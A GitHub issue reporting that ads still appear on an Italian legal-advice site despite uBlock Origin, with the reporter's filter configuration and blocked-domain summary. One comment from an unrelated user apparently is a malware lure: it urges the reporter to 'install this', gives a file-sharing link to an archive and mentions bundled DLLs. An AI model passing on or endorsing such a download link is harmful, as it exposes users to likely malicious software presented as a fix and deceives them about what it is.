### ISSUE TITLE
laleggepertutti.it: ads

### ISSUE THREAD

**Issue by xmitrax** [uBlockOrigin/uAssets#25367]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://www.laleggepertutti.it/525885_si-puo-trasformare-una-cantina-in-abitazione`

### Category

ads

### Description

I still see ads.

### Other extensions used

Firefox multi-account containers, return youtube dislike, firefox relay, downthemall!

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

https://i.postimg.cc/59KMFdwY/Screenshot-2024-09-19-alle-11-55-20.png

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Firefox: 130
filterset (summary):
 network: 152020
 cosmetic: 55451
 scriptlet: 20881
 html: 1977
listset (total-discarded, last-updated):
 default:
  user-filters: 0-0, never
  ublock-filters: 40477-138, 1h.48m Δ
  ublock-badware: 11271-6, 1h.48m Δ
  ublock-privacy: 1177-27, 1h.48m Δ
  ublock-unbreak: 2523-1, 1h.48m Δ
  ublock-quick-fixes: 127-4, 1h.48m Δ
  easylist: 85348-185, 1h.48m Δ
  easyprivacy: 53073-62, 1h.48m Δ
  urlhaus-1: 25635-0, now
  plowe-0: 3542-992, now
  ITA-0: 8759-39, now
filterset (user): [empty]
trustedset:
 added: [array of 9 redacted]
switchRuleset:
 added: [array of 5 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 11108 ms (selfie)
 maxAssetCacheWait: 2278 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 38
 no-popups: true
 network:
  cleantalk.org: 1
  criteo.net: 1
  doubleclick.net: 1
  google-analytics.com: 1
  googletagmanager.com: 1
  html-load.com: 33
 extended:
  ##ins.adsbygoogle[data-ad-client]
  ##ins.adsbygoogle[data-ad-slot]
  ##.div_topbanner
  ##.notizie-blue-bnr-one
  ##.notizie-blue-bnr-two
```
</details>

**Comment by Aljallaf100** [comment]
install this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
I put the necessary dlls in the archive

**Comment by xmitrax** [comment]
I have Macos, not windows.
